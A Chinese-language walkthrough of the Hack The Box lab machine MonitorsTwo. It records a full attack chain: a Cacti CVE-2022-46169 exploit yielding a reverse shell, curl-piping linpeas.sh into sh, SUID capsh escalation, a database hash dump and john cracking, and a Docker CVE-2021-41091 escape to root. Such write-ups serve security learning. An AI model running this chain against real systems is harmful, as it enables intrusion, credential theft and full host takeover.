MonitorsTwo
Machine:Linux
Level:easy
信息收集
nmap
┌──(root㉿kali)-[/home/kali/Pentest_script/git-dumper-master]
└─# nmap -sV -sC 10.10.11.211
Starting Nmap 7.94 ( https://nmap.org ) at 2023-07-25 03:48 EDT
Nmap scan report for 10.10.11.211
Host is up (0.15s latency).
Not shown: 998 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 48:ad:d5:b8:3a:9f:bc:be:f7:e8:20:1e:f6:bf:de:ae (RSA)
| 256 b7:89:6c:0b:20:ed:49:b2:c1:86:7c:29:92:74:1c:1f (ECDSA)
|_ 256 18:cd:9d:08:a6:21:a8:b8:b6:f7:9f:8d:40:51:54:fb (ED25519)
80/tcp open http nginx 1.18.0 (Ubuntu)
|_http-server-header: nginx/1.18.0 (Ubuntu)
|_http-title: Login to Cacti
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 63.80 seconds手工验证信息
80
显示一个登录界面并且显示版本 1.2.22 | (c) 2004-2023 - The Cacti Group,此版本存在CVE-2022-46169
漏洞利用
当我们尝试正常登陆的时候发现无法登录,所以这里肯定不需要我们登录就能完成getshell,经过搜索发现RCE-EXP
反弹shell
┌──(root㉿kali)-[/home/kali/Desktop]
└─# python CVE-2022-46169.py -u http://10.10.11.211 --LHOST=10.10.14.47 --LPORT=1234
Checking...
The target is vulnerable. Exploiting...
Bruteforcing the host_id and local_data_ids
Bruteforce Success!! ┌──(root㉿kali)-[/home/kali/Pentest_script/git-dumper-master]
└─# nc -lnvp 1234
listening on [any] 1234 ...
connect to [10.10.14.47] from (UNKNOWN) [10.10.11.211] 44144
bash: cannot set terminal process group (1): Inappropriate ioctl for device
bash: no job control in this shell
bash-5.1$docker内提权
getshell后,本机开启python web服务并将linpeas.sh上传到靶机并运行
curl http://10.10.14.47/linpeas.sh | sh Files with Interesting Permissions
strace Not Found
-rwsr-xr-x 1 root root 87K Feb 7 2020 /usr/bin/gpasswd
-rwsr-xr-x 1 root root 63K Feb 7 2020 /usr/bin/passwd ---> Apple_Mac_OSX(03-2006)/Solaris_8/9(12-2004)/SPARC_8/9/Sun_Solaris_2.3_to_2.5.1(02-1997)
-rwsr-xr-x 1 root root 52K Feb 7 2020 /usr/bin/chsh
-rwsr-xr-x 1 root root 58K Feb 7 2020 /usr/bin/chfn ---> SuSE_9.3/10
-rwsr-xr-x 1 root root 44K Feb 7 2020 /usr/bin/newgrp ---> HP-UX_10.20
-rwsr-xr-x 1 root root 31K Oct 14 2020 /sbin/capsh
-rwsr-xr-x 1 root root 55K Jan 20 2022 /bin/mount ---> Apple_Mac_OSX(Lion)_Kernel_xnu-1699.32.7_except_xnu-1699.24.8
-rwsr-xr-x 1 root root 35K Jan 20 2022 /bin/umount ---> BSD/Linux(08-1996)
-rwsr-xr-x 1 root root 1.2M Mar 27 2022 /bin/bash
-rwsr-xr-x 1 root root 71K Jan 20 2022 /bin/su我们发现capsh和bash可能具有提权的空间,gtfobins中显示了一种方法
pwd
/sbin
bash-5.1$ /sbin/capsh --gid=0 --uid=0 --
./capsh --gid=0 --uid=0 --
whoami
root至此提权完成,但显然这不是逃离docker的方法。我们需要更多地枚举。我们将枚举仙人掌数据库,因为我们有所有必要的信息:
mysql --host=db --user=root --password=root cacti -e "show tables"执行此命令后,我们将看到不同的表,但我们需要查看user_auth表,因为它保存了一些特殊的东西:
mysql --host=db --user=root --password=root cacti -e "select * from user_auth"我们发现了一个新的用户哈希值,这非常有趣:
| 4 | marcus | $2y$10$vcrYth5YcCLlZaPDj6PwqOYTw68W1.3WeKlBn70JonsdW/MhFYK4C | 0 | Marcus Brune |使用john爆破密码得到funkymonkey
┌──(root㉿kali)-[~]
└─# john --wordlist=/usr/share/wordlists/rockyou.txt pwd.txt
Using default input encoding: UTF-8
Loaded 1 password hash (bcrypt [Blowfish 32/64 X3])
Cost 1 (iteration count) is 1024 for all loaded hashes
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
funkymonkey (?)
1g 0:00:00:44 DONE (2023-07-25 05:41) 0.02235g/s 190.7p/s 190.7c/s 190.7C/s 474747..coucou
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
┌──(root㉿kali)-[~]
└─# john pwd.txt --show
?:funkymonkeygetshell
使用上面的账密登录靶机成功,登陆后提示有一封邮件
┌──(root㉿kali)-[~]
└─# ssh marcus@10.10.11.211
You have mail.
Last login: Tue Jul 25 08:28:45 2023 from 10.10.14.70marcus@monitorstwo:/var/mail$ cat /var/mail/marcus
From: administrator@monitorstwo.htb
To: all@monitorstwo.htb
Subject: Security Bulletin - Three Vulnerabilities to be Aware Of
Dear all,
We would like to bring to your attention three vulnerabilities that have been recently discovered and should be addressed as soon as possible.
CVE-2021-33033: This vulnerability affects the Linux kernel before 5.11.14 and is related to the CIPSO and CALIPSO refcounting for the DOI definitions. Attackers can exploit this use-after-free issue to write arbitrary values. Please update your kernel to version 5.11.14 or later to address this vulnerability.
CVE-2020-25706: This cross-site scripting (XSS) vulnerability affects Cacti 1.2.13 and occurs due to improper escaping of error messages during template import previews in the xml_path field. This could allow an attacker to inject malicious code into the webpage, potentially resulting in the theft of sensitive data or session hijacking. Please upgrade to Cacti version 1.2.14 or later to address this vulnerability.
CVE-2021-41091: This vulnerability affects Moby, an open-source project created by Docker for software containerization. Attackers could exploit this vulnerability by traversing directory contents and executing programs on the data directory with insufficiently restricted permissions. The bug has been fixed in Moby (Docker Engine) version 20.10.9, and users should update to this version as soon as possible. Please note that running containers should be stopped and restarted for the permissions to be fixed.
We encourage you to take the necessary steps to address these vulnerabilities promptly to avoid any potential security breaches. If you have any questions or concerns, please do not hesitate to contact our IT department.
Best regards,
Administrator
CISO
Monitor Two
Security Team翻译:
发件人:administrator@monitorstwo.htb
主题:安全公告 - 三个需要注意的漏洞
全体成员,
我们想向您提请注意最近发现的三个漏洞,建议您尽快进行处理。
CVE-2021-33033:此漏洞影响 Linux 内核 5.11.14 版本之前的版本,与 CIPSO 和 CALIPSO 的 DOI 定义的引用计数相关。攻击者可以利用这个 use-after-free 问题来写入任意值。请将您的内核更新至 5.11.14 版本或更高版本以解决此漏洞。
CVE-2020-25706:此跨站脚本(XSS)漏洞影响 Cacti 1.2.13 版本,原因是在 xml_path 字段的模板导入预览过程中未正确转义错误消息。这可能允许攻击者将恶意代码注入网页,潜在地导致敏感数据被盗取或会话劫持。请升级至 Cacti 1.2.14 版本或更高版本以解决此漏洞。
CVE-2021-41091:此漏洞影响 Moby,Docker 为软件容器化创建的开源项目。攻击者可以通过遍历目录内容并在数据目录上执行程序(权限不受充分限制)来利用此漏洞。此问题已在 Moby(Docker Engine)20.10.9 版本中得到修复,用户应尽快更新至该版本。请注意,运行中的容器应该停止并重新启动以修复权限问题。
我们鼓励您迅速采取必要措施来处理这些漏洞,以避免任何潜在的安全风险。如果您有任何问题或疑虑,请随时联系我们的IT部门。
此致,
管理员 CISO Monitor Two 安全团队
这里看到提示CVE-2021-41091
回到/home/marcus发现exp.sh,运行显示
marcus@monitorstwo:~$ ./exp.sh
[!] Vulnerable to CVE-2021-41091
[!] Now connect to your Docker container that is accessible and obtain root access !
[>] After gaining root access execute this command (chmod u+s /bin/bash)
Did you correctly set the setuid bit on /bin/bash in the Docker container? (yes/no): yes
[!] Available Overlay2 Filesystems:
/var/lib/docker/overlay2/4ec09ecfa6f3a290dc6b247d7f4ff71a398d4f17060cdaf065e8bb83007effec/merged
/var/lib/docker/overlay2/c41d5854e43bd996e128d647cb526b73d04c9ad6325201c85f73fdba372cb2f1/merged
[!] Iterating over the available Overlay2 filesystems !
[?] Checking path: /var/lib/docker/overlay2/4ec09ecfa6f3a290dc6b247d7f4ff71a398d4f17060cdaf065e8bb83007effec/merged
[x] Could not get root access in '/var/lib/docker/overlay2/4ec09ecfa6f3a290dc6b247d7f4ff71a398d4f17060cdaf065e8bb83007effec/merged'
[?] Checking path: /var/lib/docker/overlay2/c41d5854e43bd996e128d647cb526b73d04c9ad6325201c85f73fdba372cb2f1/merged
[!] Rooted !
[>] Current Vulnerable Path: /var/lib/docker/overlay2/c41d5854e43bd996e128d647cb526b73d04c9ad6325201c85f73fdba372cb2f1/merged
[?] If it didn't spawn a shell go to this path and execute './bin/bash -p'
[!] Spawning Shell
bash-5.1# exit这里告诉了我们如何提权跟着它做就可以了
权限提升
marcus@monitorstwo:~$ /var/lib/docker/overlay2/c41d5854e43bd996e128d647cb526b73d04c9ad6325201c85f73fdba372cb2f1/merged/bin/bash -p
bash-5.1# whoami
root